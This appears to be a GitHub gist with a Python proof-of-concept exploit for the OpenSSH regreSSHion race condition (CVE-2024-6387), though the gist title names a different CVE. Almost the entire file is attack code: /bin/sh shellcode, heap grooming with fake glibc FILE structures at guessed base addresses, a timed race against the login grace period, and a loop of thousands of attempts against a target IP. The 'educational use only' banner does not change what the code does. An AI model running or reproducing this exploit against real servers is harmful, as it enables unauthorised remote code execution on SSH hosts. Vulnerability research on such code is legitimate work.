Created
March 19, 2026 04:50
-
-
Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.
CVE-2025-27480
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| CVE-2024-6387 PoC - Windows Fixed Version | |
| Resolves WinError 10022 and other Windows socket issues | |
| """ | |
| import socket | |
| import struct | |
| import time | |
| import sys | |
| import os | |
| import errno | |
| import select | |
| import argparse | |
| from datetime import datetime | |
| # ============================================================================ | |
| # Platform Detection & Configuration | |
| # ============================================================================ | |
| IS_WINDOWS = sys.platform.startswith('win') | |
| IS_LINUX = sys.platform.startswith('linux') | |
| MAX_PACKET_SIZE = 256 * 1024 | |
| LOGIN_GRACE_TIME = 120 | |
| # Windows-specific timing adjustments | |
| if IS_WINDOWS: | |
| TIMING_PRECISION = 0.002 | |
| SOCKET_TIMEOUT = 3.0 | |
| CONNECT_TIMEOUT = 5.0 | |
| else: | |
| TIMING_PRECISION = 0.001 | |
| SOCKET_TIMEOUT = 1.0 | |
| CONNECT_TIMEOUT = 3.0 | |
| def chunk_align(size): | |
| return (size + 15) & ~15 | |
| # glibc base addresses (ปรับตามเป้าหมาย) | |
| GLIBC_BASES = [0xb7200000, 0xb7400000, 0xb7600000] | |
| # Shellcode placeholder | |
| SHELLCODE = ( | |
| b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" | |
| b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90" | |
| ) | |
| # ============================================================================ | |
| # Logging Functions | |
| # ============================================================================ | |
| def log(msg, level="INFO"): | |
| timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3] | |
| colors = { | |
| "INFO": "\033[94m", | |
| "SUCCESS": "\033[92m", | |
| "WARNING": "\033[93m", | |
| "ERROR": "\033[91m", | |
| "DEBUG": "\033[90m", | |
| } | |
| reset = "\033[0m" if not IS_WINDOWS else "" | |
| color = colors.get(level, "") | |
| print(f"{color}[{timestamp}] [{level}] {msg}{reset}") | |
| def log_debug(msg): | |
| if args.verbose: | |
| log(msg, "DEBUG") | |
| # ============================================================================ | |
| # Socket Functions - FIXED FOR WINDOWS | |
| # ============================================================================ | |
| def setup_connection(ip, port): | |
| """ | |
| Create TCP connection - FIXED to avoid WinError 10022 | |
| """ | |
| sock = None | |
| try: | |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # ✅ FIXED: Set socket options BEFORE connect, and only compatible ones | |
| sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| # ❌ REMOVED: SO_EXCLUSIVEADDRUSE causes WinError 10022 on some Windows versions | |
| # if IS_WINDOWS: | |
| # sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1) | |
| if IS_WINDOWS: | |
| # Windows: Use blocking mode for connect (more reliable) | |
| sock.settimeout(CONNECT_TIMEOUT) | |
| log_debug(f"Connecting to {ip}:{port}...") | |
| sock.connect((ip, port)) | |
| # Switch to non-blocking after connection established | |
| sock.setblocking(False) | |
| log_debug("Connected, switched to non-blocking mode") | |
| else: | |
| # Linux: Non-blocking connect | |
| sock.setblocking(False) | |
| result = sock.connect_ex((ip, port)) | |
| if result == 0: | |
| pass | |
| elif result == errno.EINPROGRESS: | |
| _, writable, _ = select.select([], [sock], [], CONNECT_TIMEOUT) | |
| if not writable: | |
| log("Connection timeout", "ERROR") | |
| sock.close() | |
| return None | |
| err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) | |
| if err != 0: | |
| log(f"Connection failed: {os.strerror(err)}", "ERROR") | |
| sock.close() | |
| return None | |
| else: | |
| log(f"Connect error: {os.strerror(result)}", "ERROR") | |
| sock.close() | |
| return None | |
| return sock | |
| except socket.timeout: | |
| log("Connection timeout", "ERROR") | |
| except ConnectionRefusedError: | |
| log(f"Connection refused by {ip}:{port}", "ERROR") | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10061: | |
| log("Connection refused (WinError 10061)", "ERROR") | |
| elif win_err == 10060: | |
| log("Connection timeout (WinError 10060)", "ERROR") | |
| elif win_err == 10022: | |
| log("Invalid argument (WinError 10022) - check socket options", "ERROR") | |
| else: | |
| log(f"Socket OS error (winerror={win_err}): {e}", "ERROR") | |
| except Exception as e: | |
| log(f"setup_connection error: {type(e).__name__}: {e}", "ERROR") | |
| if sock: | |
| try: | |
| sock.close() | |
| except: | |
| pass | |
| return None | |
| def is_socket_connected(sock): | |
| """Check if socket is still connected""" | |
| if sock is None: | |
| return False | |
| try: | |
| sock.getpeername() | |
| if IS_WINDOWS: | |
| try: | |
| _, _, err = select.select([], [], [sock], 0) | |
| if err: | |
| return False | |
| except: | |
| return False | |
| return True | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err in [10053, 10054, 10038, 10057, 10022]: | |
| return False | |
| return False | |
| except: | |
| return False | |
| def send_packet(sock, packet_type, data, allow_partial=False): | |
| """Send SSH packet - Windows-compatible""" | |
| if not is_socket_connected(sock): | |
| log("Cannot send: socket disconnected", "ERROR") | |
| return False | |
| try: | |
| packet_len = len(data) + 5 | |
| header = struct.pack('>I', packet_len) | |
| packet = header + bytes([packet_type]) + data | |
| # Windows: Send in chunks for large packets | |
| if IS_WINDOWS and len(packet) > 16384: | |
| chunk_size = 16384 | |
| total_sent = 0 | |
| while total_sent < len(packet): | |
| chunk = packet[total_sent:total_sent + chunk_size] | |
| sent = sock.send(chunk) | |
| if sent == 0: | |
| log("Socket send returned 0", "ERROR") | |
| return False | |
| total_sent += sent | |
| if total_sent < len(packet): | |
| time.sleep(0.001) | |
| else: | |
| sock.sendall(packet) | |
| log_debug(f"Sent packet: type={packet_type}, len={len(packet)}") | |
| return True | |
| except BrokenPipeError: | |
| log("Broken pipe - server closed connection", "WARNING") | |
| return False | |
| except ConnectionResetError: | |
| log("Connection reset by peer", "WARNING") | |
| return False | |
| except ConnectionAbortedError: | |
| log("Connection aborted", "WARNING") | |
| return False | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("[WinError 10053] Connection aborted", "WARNING") | |
| return False | |
| elif win_err == 10054: | |
| log("[WinError 10054] Connection reset", "WARNING") | |
| return False | |
| elif win_err == 10022: | |
| log("[WinError 10022] Invalid argument - socket may be invalid", "ERROR") | |
| return False | |
| elif win_err == 10035: # WSAEWOULDBLOCK | |
| if allow_partial: | |
| return True | |
| log("Socket would block", "WARNING") | |
| return False | |
| else: | |
| log(f"send_packet OSError (winerror={win_err}): {e}", "ERROR") | |
| return False | |
| except Exception as e: | |
| log(f"send_packet error: {type(e).__name__}: {e}", "ERROR") | |
| return False | |
| def recv_nonblocking(sock, bufsize, timeout=None): | |
| """Receive data with timeout""" | |
| if timeout is None: | |
| timeout = SOCKET_TIMEOUT | |
| start = time.monotonic() | |
| data = b"" | |
| while True: | |
| elapsed = time.monotonic() - start | |
| if elapsed >= timeout: | |
| break | |
| try: | |
| chunk = sock.recv(bufsize) | |
| if chunk: | |
| data += chunk | |
| break | |
| if not chunk: | |
| break | |
| except BlockingIOError: | |
| time.sleep(0.01 if IS_WINDOWS else 0.001) | |
| continue | |
| except ConnectionResetError: | |
| break | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err in [10053, 10054, 10022]: | |
| break | |
| elif win_err == 10035: | |
| time.sleep(0.01 if IS_WINDOWS else 0.001) | |
| continue | |
| else: | |
| break | |
| except: | |
| break | |
| return data | |
| # ============================================================================ | |
| # SSH Protocol Functions | |
| # ============================================================================ | |
| def send_ssh_version(sock): | |
| version = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n" | |
| try: | |
| sock.sendall(version) | |
| return True | |
| except Exception as e: | |
| log(f"send_ssh_version error: {e}", "ERROR") | |
| return False | |
| def receive_ssh_version(sock, timeout=3.0): | |
| try: | |
| data = recv_nonblocking(sock, 256, timeout=timeout) | |
| if data: | |
| try: | |
| log(f"Received SSH version: {data.decode('ascii', errors='replace').strip()}") | |
| except: | |
| log(f"Received: {data[:50]}", "DEBUG") | |
| return True | |
| except Exception as e: | |
| log(f"receive_ssh_version error: {e}", "DEBUG") | |
| log("Failed to receive SSH version", "ERROR") | |
| return False | |
| def send_kex_init(sock): | |
| kexinit_payload = bytes(36) | |
| return send_packet(sock, 20, kexinit_payload) | |
| def receive_kex_init(sock, timeout=2.0): | |
| try: | |
| data = recv_nonblocking(sock, 2048, timeout=timeout) | |
| if data and len(data) >= 5: | |
| log(f"Received KEX_INIT ({len(data)} bytes)", "DEBUG") | |
| return True | |
| except Exception as e: | |
| log(f"receive_kex_init error: {e}", "DEBUG") | |
| return False | |
| def perform_ssh_handshake(sock): | |
| log("Performing SSH handshake...", "DEBUG") | |
| if not send_ssh_version(sock): | |
| return False | |
| if not receive_ssh_version(sock): | |
| return False | |
| if not send_kex_init(sock): | |
| return False | |
| return True | |
| # ============================================================================ | |
| # Heap Manipulation Functions | |
| # ============================================================================ | |
| def prepare_heap(sock): | |
| log("Preparing heap layout...", "DEBUG") | |
| for i in range(10): | |
| tcache_chunk = b'A' * 64 | |
| send_packet(sock, 5, tcache_chunk) | |
| for i in range(27): | |
| large_hole = b'B' * 8192 | |
| send_packet(sock, 5, large_hole) | |
| small_hole = b'C' * 320 | |
| send_packet(sock, 5, small_hole) | |
| for i in range(27): | |
| fake_data = create_fake_file_structure(4096, GLIBC_BASES[0]) | |
| send_packet(sock, 5, fake_data) | |
| large_string = b'E' * (MAX_PACKET_SIZE - 1) | |
| send_packet(sock, 5, large_string) | |
| log("Heap preparation complete", "DEBUG") | |
| def create_fake_file_structure(size, glibc_base): | |
| data = bytearray(size) | |
| struct.pack_into('<I', data, 0x88, 0x61) | |
| fake_vtable = glibc_base + 0x21b740 | |
| fake_codecvt = glibc_base + 0x21d7f8 | |
| struct.pack_into('<I', data, size - 8, fake_vtable & 0xFFFFFFFF) | |
| struct.pack_into('<I', data, size - 4, fake_codecvt & 0xFFFFFFFF) | |
| return bytes(data) | |
| # ============================================================================ | |
| # Timing Functions | |
| # ============================================================================ | |
| def measure_response_time(sock, error_type, timeout=1.0): | |
| if error_type == 1: | |
| error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3" | |
| else: | |
| error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9" | |
| start = time.monotonic() | |
| send_packet(sock, 50, error_packet) | |
| recv_nonblocking(sock, 1024, timeout=timeout) | |
| end = time.monotonic() | |
| return end - start | |
| def time_final_packet(sock): | |
| log("Measuring packet parsing time...", "DEBUG") | |
| times = [] | |
| for error_type in [1, 2, 1, 2]: | |
| t = measure_response_time(sock, error_type) | |
| times.append(t) | |
| time.sleep(0.01) | |
| times.sort() | |
| parsing_time = (times[1] + times[2]) / 2 if len(times) >= 4 else times[0] | |
| log(f"Estimated parsing time: {parsing_time:.6f} seconds", "INFO") | |
| return parsing_time | |
| # ============================================================================ | |
| # Exploit Core Functions | |
| # ============================================================================ | |
| def create_public_key_packet(size, glibc_base): | |
| packet = bytearray(size) | |
| offset = 0 | |
| for i in range(27): | |
| large_size = chunk_align(4096) | |
| struct.pack_into('<I', packet, offset, large_size) | |
| offset += large_size | |
| small_size = chunk_align(304) | |
| struct.pack_into('<I', packet, offset, small_size) | |
| offset += small_size | |
| packet[0:8] = b"ssh-rsa " | |
| shellcode_offset = chunk_align(4096) * 13 + chunk_align(304) * 13 | |
| if shellcode_offset + len(SHELLCODE) <= size: | |
| packet[shellcode_offset:shellcode_offset+len(SHELLCODE)] = SHELLCODE | |
| for i in range(27): | |
| file_offset = chunk_align(4096) * (i + 1) + chunk_align(304) * i | |
| if file_offset + 304 <= size: | |
| fake_file = create_fake_file_structure(304, glibc_base) | |
| packet[file_offset:file_offset+304] = fake_file[:304] | |
| return bytes(packet) | |
| def attempt_race_condition(sock, parsing_time, glibc_base): | |
| log(f"Attempting race condition (glibc: 0x{glibc_base:x})...", "INFO") | |
| if not is_socket_connected(sock): | |
| log("Socket disconnected before exploit", "ERROR") | |
| return False | |
| final_packet = create_public_key_packet(MAX_PACKET_SIZE, glibc_base) | |
| try: | |
| log_debug(f"Sending packet body ({len(final_packet)-1} bytes)...") | |
| if not send_packet(sock, 5, final_packet[:-1], allow_partial=True): | |
| log("Failed to send packet body", "WARNING") | |
| return False | |
| timing_buffer = TIMING_PRECISION * 2 | |
| target_elapsed = LOGIN_GRACE_TIME - parsing_time - timing_buffer | |
| if target_elapsed < 0: | |
| log(f"Invalid timing: {target_elapsed:.3f}s", "ERROR") | |
| return False | |
| log_debug(f"Target send time: {target_elapsed:.3f}s") | |
| start = time.monotonic() | |
| while True: | |
| if not is_socket_connected(sock): | |
| log("Connection lost during timing", "WARNING") | |
| return False | |
| elapsed = time.monotonic() - start | |
| remaining = target_elapsed - elapsed | |
| if remaining <= 0: | |
| log_debug(f"Sending final byte at {elapsed:.6f}s") | |
| try: | |
| sock.sendall(final_packet[-1:]) | |
| break | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("Connection aborted on final byte", "WARNING") | |
| return False | |
| raise | |
| except Exception as e: | |
| log(f"Error sending final byte: {e}", "ERROR") | |
| return False | |
| sleep_time = min(0.002 if IS_WINDOWS else 0.0005, max(0, remaining * 0.1)) | |
| if sleep_time > 0: | |
| time.sleep(sleep_time) | |
| log("Checking for exploitation indicators...", "DEBUG") | |
| try: | |
| sock.settimeout(0.05 if IS_WINDOWS else 0.02) | |
| response = sock.recv(1024) | |
| sock.setblocking(False) | |
| if response: | |
| log(f"Received {len(response)} bytes post-exploit", "DEBUG") | |
| if not response.startswith(b"SSH-2.0-"): | |
| log("Possible race window hit!", "SUCCESS") | |
| return True | |
| except socket.timeout: | |
| log("No response - ambiguous result", "WARNING") | |
| return True | |
| except ConnectionResetError: | |
| log("Connection reset - possible success!", "SUCCESS") | |
| return True | |
| except OSError as e: | |
| win_err = getattr(e, 'winerror', None) | |
| if win_err == 10053: | |
| log("Connection aborted post-exploit", "WARNING") | |
| return True | |
| raise | |
| except Exception as e: | |
| log(f"attempt_race_condition error: {type(e).__name__}: {e}", "ERROR") | |
| return False | |
| return False | |
| # ============================================================================ | |
| # Main Exploit Loop | |
| # ============================================================================ | |
| def exploit_target(ip, port, max_attempts=20000): | |
| log(f"Targeting {ip}:{port}", "INFO") | |
| log(f"Max attempts: {max_attempts}", "INFO") | |
| log(f"Platform: {'Windows' if IS_WINDOWS else 'Linux/Unix'}", "INFO") | |
| if IS_WINDOWS: | |
| log("⚠️ Windows detected: timing precision ~2ms", "WARNING") | |
| success = False | |
| total_attempts = 0 | |
| for base_idx, glibc_base in enumerate(GLIBC_BASES): | |
| if success: | |
| break | |
| log(f"\n[*] glibc base: 0x{glibc_base:x}", "INFO") | |
| for attempt in range(max_attempts // len(GLIBC_BASES)): | |
| total_attempts += 1 | |
| if attempt % 1000 == 0 and attempt > 0: | |
| log(f"Progress: {attempt}/{max_attempts // len(GLIBC_BASES)}", "INFO") | |
| sock = setup_connection(ip, port) | |
| if not sock: | |
| continue | |
| if not perform_ssh_handshake(sock): | |
| sock.close() | |
| continue | |
| prepare_heap(sock) | |
| parsing_time = time_final_packet(sock) | |
| if attempt_race_condition(sock, parsing_time, glibc_base): | |
| log(f"\n[!] Possible success!", "SUCCESS") | |
| log(f" Attempts: {total_attempts}", "SUCCESS") | |
| success = True | |
| break | |
| try: | |
| sock.close() | |
| except: | |
| pass | |
| time.sleep(0.1) | |
| log(f"\nComplete. Total attempts: {total_attempts}", "INFO") | |
| return success | |
| # ============================================================================ | |
| # Debug & Utility Functions | |
| # ============================================================================ | |
| def debug_connection_test(ip, port): | |
| log(f"Debug: Testing {ip}:{port}", "INFO") | |
| sock = setup_connection(ip, port) | |
| if not sock: | |
| log("Debug: Failed to connect", "ERROR") | |
| return False | |
| log("Debug: Connected", "SUCCESS") | |
| if send_ssh_version(sock): | |
| log("Debug: Sent version", "SUCCESS") | |
| else: | |
| log("Debug: Failed to send version", "ERROR") | |
| sock.close() | |
| return False | |
| response = recv_nonblocking(sock, 256, timeout=3.0) | |
| if response: | |
| log(f"Debug: Received: {response[:100]}", "INFO") | |
| else: | |
| log("Debug: No response", "WARNING") | |
| if send_packet(sock, 5, b"test"): | |
| log("Debug: Sent test packet", "SUCCESS") | |
| else: | |
| log("Debug: Failed test packet", "WARNING") | |
| sock.close() | |
| log("Debug: Complete", "INFO") | |
| return True | |
| def check_target_version(ip, port): | |
| log(f"Checking OpenSSH version on {ip}:{port}...", "INFO") | |
| try: | |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| sock.settimeout(5.0) | |
| sock.connect((ip, port)) | |
| banner = b"" | |
| while b"\n" not in banner: | |
| chunk = sock.recv(256) | |
| if not chunk: | |
| break | |
| banner += chunk | |
| sock.close() | |
| banner_str = banner.decode('ascii', errors='replace').strip() | |
| log(f"Banner: {banner_str}", "INFO") | |
| if "OpenSSH_" in banner_str: | |
| version_part = banner_str.split("OpenSSH_")[1].split()[0] | |
| log(f"Version: {version_part}", "INFO") | |
| try: | |
| major, minor = map(int, version_part.replace('p', '.').split('.')[:2]) | |
| if (major == 8 and minor >= 5) or (major == 9 and minor < 8): | |
| log("⚠️ MAY BE VULNERABLE", "WARNING") | |
| else: | |
| log("✓ Appears patched", "SUCCESS") | |
| except: | |
| log("Could not parse version", "WARNING") | |
| return True | |
| except Exception as e: | |
| log(f"Version check error: {e}", "ERROR") | |
| return False | |
| # ============================================================================ | |
| # Entry Point | |
| # ============================================================================ | |
| def parse_arguments(): | |
| parser = argparse.ArgumentParser( | |
| description="CVE-2024-6387 PoC (Windows-Fixed)" | |
| ) | |
| parser.add_argument("target", help="Target IP") | |
| parser.add_argument("port", type=int, nargs="?", default=22, help="Port (default: 22)") | |
| parser.add_argument("-a", "--attempts", type=int, default=20000, help="Max attempts") | |
| parser.add_argument("-g", "--glibc", action="append", type=lambda x: int(x, 16), help="glibc base (hex)") | |
| parser.add_argument("-c", "--check", action="store_true", help="Check version only") | |
| parser.add_argument("-d", "--debug", action="store_true", help="Debug connection") | |
| parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output") | |
| return parser.parse_args() | |
| def main(): | |
| global args | |
| args = parse_arguments() | |
| if args.glibc: | |
| GLIBC_BASES[:] = args.glibc | |
| if args.debug: | |
| return 0 if debug_connection_test(args.target, args.port) else 1 | |
| if args.check: | |
| return 0 if check_target_version(args.target, args.port) else 1 | |
| print("=" * 70) | |
| print("CVE-2024-6387 regreSSHion - Windows-Fixed PoC") | |
| print("=" * 70) | |
| print("[!] EDUCATIONAL USE ONLY") | |
| print("[!] Use in authorized environments only") | |
| print("=" * 70) | |
| try: | |
| result = exploit_target(args.target, args.port, max_attempts=args.attempts) | |
| return 0 if result else 1 | |
| except KeyboardInterrupt: | |
| log("\nInterrupted", "INFO") | |
| return 130 | |
| except Exception as e: | |
| log(f"Fatal: {type(e).__name__}: {e}", "ERROR") | |
| if args.verbose: | |
| import traceback | |
| traceback.print_exc() | |
| return 2 | |
| if __name__ == "__main__": | |
| sys.exit(main()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment